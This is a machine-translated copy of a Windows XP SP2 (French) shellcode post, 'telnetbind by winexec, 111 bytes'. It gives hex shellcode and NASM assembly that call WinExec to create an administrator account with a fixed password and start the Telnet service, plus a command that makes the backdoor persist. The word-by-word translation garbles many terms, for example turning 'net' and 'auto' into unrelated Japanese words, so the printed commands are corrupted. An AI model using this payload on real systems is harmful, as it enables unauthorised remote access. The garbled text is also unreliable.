このページはEtoJ逐語翻訳フィルタによって翻訳生成されました。

翻訳前ページへ


Windows - telnetbind by winexec - 111 bytes
; payload:追加する admin acount & Telnet Listening
; Author: DATA_SNIPER
; size:111 bytes
; 壇・綱領・公約:WIN32/XP SP2 FR
; thanks:Arab4services team & AT4RE Team
; more info: visit my blog http://datasniper.arab4services.逮捕する
; The Sh3llcode:
; "\xEB\x08\xBA\x4D\x11\x86\x7C\xFF\xD2\xCC\xE8\xF3\xFF\xFF\xFF\x63\x6D\x64\x20\x2F\x63"
; "\x20\x6E\x65\x74\x20\x75\x73\x65\x72\x20\x68\x69\x6C\x6C\x20\x31\x32\x33\x34\x35"
; "\x36\x20\x2F\x41\x44\x44\x20\x26\x26\x20\x6E\x65\x74\x20\x6C\x6F\x63\x61\x6C\x67"
; "\x72\x6F\x75\x70\x20\x41\x64\x6D\x69\x6E\x69\x73\x74\x72\x61\x74\x65\x75\x72\x73"
; "\x20\x68\x69\x6C\x6C\x20\x2F\x41\x44\x44\x20\x26\x26\x20\x73\x63\x20\x73\x74\x61"
; "\x72\x74\x20\x54\x6C\x6E\x74\x53\x76\x72\x00"
; Description: it's simular to TCP BindShell on port 23,throught 命令(する) 死刑執行 we can get 爆撃する 接近 throught telnet service on Windows b0x.
; 追加する admin account 命令(する) 使用者=GAZZA ,pass=123456 :cmd /c 逮捕する 使用者 GAZZA 123456 /ADD && 逮捕する localgroup Administrateurs GAZZA /ADD
; Start telnet service: sc start TlntSvr
; For saving ur 接近 to the B0x again and again :),u can use this 命令(する):
; "sc config TlntSvr start= 自動車 &  sc start TlntSvr" instead of:
; "sc start TlntSvr"
; NASM -s -fbin telnetbind.asm
BITS 32 
db 0EBh,08h    ;such as "jmp Data" ,i puted it in opcode 判型 for 避けるing null problem.
Exec:
MOV EDX,7C86114Dh ;WinExec addr in WIN XP SP2 FR
CALL EDX
INT3 ;just interrupter (hung the shellcode after it do his 職業,any way u can use ExitProcess) for 避けるing infinite 宙返り飛行
Data:
CALL Exec
db 'cmd /c 逮捕する 使用者 GAZZA 123456 /ADD & 逮捕する localgroup Administrateurs GAZZA /ADD & sc start TlntSvr',00h
;追加する 使用者 GAZA with 123456 password and start telnet service ;BTW the exstension 削減(する)d for saving som byte ;)